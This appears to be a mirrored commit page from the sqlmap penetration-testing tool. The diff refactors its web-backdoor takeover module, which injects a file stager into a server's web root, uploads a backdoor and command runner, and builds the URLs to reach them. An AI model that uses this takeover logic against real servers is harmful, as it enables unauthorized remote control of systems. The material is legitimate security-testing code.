sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-18 12:30:36 +03:00
Code Issues Packages Projects Releases Wiki Activity

Adjustment and refactoring for takeover via web backdoor

Browse Source
This commit is contained in:
Bernardo Damele 2011-06-08 14:16:53 +00:00
parent cce3208b35
commit cd6ceb733e
1 changed files with 19 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

34
lib/takeover/web.py
View File

@ -198,9 +198,11 @@ class Web:
for j in xrange(len(directories)): for j in xrange(len(directories)):
docRoot = kb.docRoot[i] docRoot = kb.docRoot[i]
directory = directories[j] directory = directories[j]
uriPath = ""
if not all(isinstance(item, basestring) for item in [docRoot, directory]): if not all(isinstance(item, basestring) for item in [docRoot, directory]):
continue continue
directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/') directory = ntToPosixSlashes(normalizePath(directory)).replace("//", "/").rstrip('/')
docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/') docRoot = ntToPosixSlashes(normalizePath(docRoot)).replace("//", "/").rstrip('/')
@ -226,17 +228,14 @@ class Web:
else: else:
continue continue
uriPath = uriPath.replace("//", "/").rstrip('/') localPath = os.path.normpath(localPath).rstrip('/')
localPath = localPath.rstrip('/') uriPath = os.path.normpath(uriPath).rstrip('/')
if not uriPath:
uriPath = '/'
# Upload the file stager # Upload the file stager
self.__webFileInject(stagerContent, stagerName, localPath) self.__webFileInject(stagerContent, stagerName, localPath)
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath) self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, uriPath)
self.webStagerUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), stagerName) self.webStagerUrl = "%s/%s" % (self.webBaseUrl, stagerName)
uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False) uplPage, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
@ -259,7 +258,7 @@ class Web:
kb.data.__VIEWSTATE = extractRegexResult(r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I) kb.data.__VIEWSTATE = extractRegexResult(r"__VIEWSTATE[^>]+value=\"(?P<result>[^\"]+)\"", uplPage, re.I)
infoMsg = "the file stager has been successfully uploaded " infoMsg = "the file stager has been successfully uploaded "
infoMsg += "on '%s' ('%s')" % (localPath, self.webStagerUrl) infoMsg += "on '%s' - %s" % (localPath, self.webStagerUrl)
logger.info(infoMsg) logger.info(infoMsg)
if self.webApi == "asp": if self.webApi == "asp":
@ -280,7 +279,7 @@ class Web:
if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory): if self.__webFileStreamUpload(backdoorStream, backdoorName, backdoorDirectory):
self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory) self.__webFileStreamUpload(runcmdStream, runcmdName, backdoorDirectory)
self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl.rstrip('/'), backdoorName) self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = backdoorDirectory self.webDirectory = backdoorDirectory
else: else:
continue continue
@ -288,25 +287,30 @@ class Web:
else: else:
if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath): if not self.__webFileStreamUpload(backdoorStream, backdoorName, posixToNtSlashes(localPath) if Backend.isOs(OS.WINDOWS) else localPath):
warnMsg = "backdoor has not been successfully uploaded " warnMsg = "backdoor has not been successfully uploaded "
warnMsg += "with file stager probably because of " warnMsg += "through the file stager possibly because "
warnMsg += "lack of write permission." warnMsg += "the user running the web server process "
warnMsg += "has not write privileges over the folder "
warnMsg += "where the user running the DBMS process "
warnMsg += "was able to upload the file stager or "
warnMsg += "because the DBMS and web server sit on "
warnMsg += "different servers"
logger.warn(warnMsg) logger.warn(warnMsg)
message = "do you want to try the same method used " message = "do you want to try the same method used "
message += "for the file stager? [y/N] " message += "for the file stager? [Y/n] "
getOutput = readInput(message, default="N") getOutput = readInput(message, default="Y")
if getOutput in ("y", "Y"): if getOutput in ("y", "Y"):
self.__webFileInject(backdoorContent, backdoorName, localPath) self.__webFileInject(backdoorContent, backdoorName, localPath)
else: else:
continue continue
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl.rstrip('/'), backdoorName) self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
self.webDirectory = localPath self.webDirectory = localPath
infoMsg = "the backdoor has probably been successfully " infoMsg = "the backdoor has probably been successfully "
infoMsg += "uploaded on '%s', go with your browser " % self.webDirectory infoMsg += "uploaded on '%s' - " % self.webDirectory
infoMsg += "to '%s' and enjoy it!" % self.webBackdoorUrl infoMsg += self.webBackdoorUrl
logger.info(infoMsg) logger.info(infoMsg)
success = True success = True